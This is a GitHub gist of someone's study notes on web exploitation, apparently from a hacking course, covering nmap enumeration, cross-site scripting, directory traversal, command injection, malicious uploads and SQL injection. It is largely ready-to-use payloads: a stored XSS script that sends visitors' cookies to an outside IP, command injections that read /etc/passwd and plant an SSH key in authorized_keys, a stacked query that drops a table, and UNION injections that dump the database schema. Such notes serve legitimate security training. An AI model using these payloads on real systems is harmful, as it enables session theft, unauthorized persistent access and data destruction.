Skip to content

Instantly share code, notes, and snippets.

@ZacFran

ZacFran/Web_Exploitation.md

Last active August 15, 2023 21:44
Show Gist options
  • Save ZacFran/a4f25015c18559a38e8b16767150ad56 to your computer and use it in GitHub Desktop.
Save ZacFran/a4f25015c18559a38e8b16767150ad56 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Web_Exploitation.md

Notes

  • Hyper-Text Transfer Protocol
    HTTP methods
    Response Codes
    HTTP Fields
wget -r -l2 -P /tmp ftp://ftpserver/
wget --save-cookies cookies.txt --keep-session-cookies --post-data 'user=1&password=2' https://website
wget --load-cookies cookies.txt -p https://website/interesting/article.php
  • More Scripts
  • JavaScript
    allow websites to interact with the client
    JavaScript runs on the client's machine

Enumeration

  • ROBOTS.TXT
    provides webcrawler a list of directories
nmap -v -sT -T5 --script http-enum.nse <target ips>
nmap -v -sT -T5 --script http-robots.txt.nse <target ips>
nmap -Pn -T5 -sT --script http-sql-injection.nse <IP>
*** niko -h <target ip> ***

cross-Site Scripting (XSS)

  • Reflected
    client side
    Transient, occurs in error messages or search results
    URLs can be Base64 encoded
  • Stored
    Resides on the vulnerable site
    Only reqires user to visit
# this will steal cookies from a message board
 <script>document.location="http://10.50.20.97/Cookie_Stealer1.php?username=" + document.cookie;</script>

Server-Side injection

The ablity to traversal thourgh Directory
Use reltive paths ../../../

Command Injection

  • the ablity to run commands on a server
# The ';' semicollon allows you to inject commands
; cat /etc/passwd


# method to add a ssh public key to http server
ssh-keygen -t rsa # local side
cat ~/.ssh/id_rsa.pub # copy the full text
# command injection 
; whoami # the user the webserver is login as 
; cat /etc/passwd # to find the home directory
; ls -la <home dirctory> # check to see if the directory is created 
; mkdir /home/dir # if the webserver user hasn't loged oun.
; echo "<public key> student@lin-op" >> /home/dir/.ssh/authorized_keys # add a new authorized_key
; cat /home/dir/.ssh/authorized_keys # check

Maliciours File Upload

when a server allows you to upload a file without validation.
you can find a upload a .php that give you a shell.
Then you can use the shell to do a command injection.

Structured Query Language

a standed database management language
SQL Commmands

SHOW databases;
SHOW TABLES FROM session;
SELECT * FROM session.car;
USE session;
SHOW Tables;
DESCRIBE car;
SELECT * FROM car;
SELECT * FROM car UNION SELECT tireid,name,size,cost,1,2 FROM Tires;
  • SQL Injection
    uses a valid query from the client sided
  • Unsanitized Fields
    the input field is vernable to basic SQL enjection
    Found using a single quote `
  • Sanitized Fields
    the input field are checked to prevent harm to the database
# Truth Statement
USE session;
SELECT id FROM user WHERE name='tom' OR 1=1; 
# This works because the OR clause 1=1 is true, so the database will return all entries housed in id field



# Stacking Statement
# Chaing multiple statements togeter using a semi-colon
# some servers do not allow Stacking statements
SELECT * FROM user WHERE id=‘Johnny'; DROP TABLE Customers; --’
# Nesting statements
<INITIAL QUERY> UNION SELECT 1,2,name FROM user; -- This is the Nested Statement added to the below Query

SELECT carid, name, (SELECT SUM(cost) FROM Tires WHERE name = "goodyear") FROM car WHERE name = "ford" UNION SELECT 1,2,name


# comments abuse 
# use a comment like # or -- to within a query to ignore serverside arguments 
# Input to Inject:
1 or 1=1; #
#Server-Side Query becomes:
SELECT product FROM item WHERE id = 1 or 1=1; # limit 1;


# Blind SQL injection:

# Occurs when an attacker sends TRUE/FALSE statements to determine how the database is configured.

<URL>/uniondemo.php?Selection=2 Union SELECT 1,2   <!-- GET METHOD, enter in the URL -->
Audi' UNION SELECT 1,2,3,4 #                      <!-- POST METHOD, enter in the Input Field -->
Abuse The Client (GET METHOD)

Passing injection through the URL:

After the .php?item=4 pass your UNION statement


prices.php?item=4 UNION SELECT 1,2


prices.php?item=4 UNION SELECT 1,2,@@version
# @@version will return the host information for the SQL server.



### GET Method ###
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1; -- FUZZED PAGES
<URL>/placeholder.php?<DataBase>=<1.2.3.....> UNION SELECT table_schema,column_name,table_name FROM information_schema.columns -- Golden statems
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1;

### POST Method ###
tom' OR 1=1 #
press F12
copy raw sql from post
xfreerdp -windows box with port 3389
      
      net group 
      net users
      whoami 
      net localgroup 
      ### gui ### 
      reg edit
        run 
        runonce
      services 
      sch tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment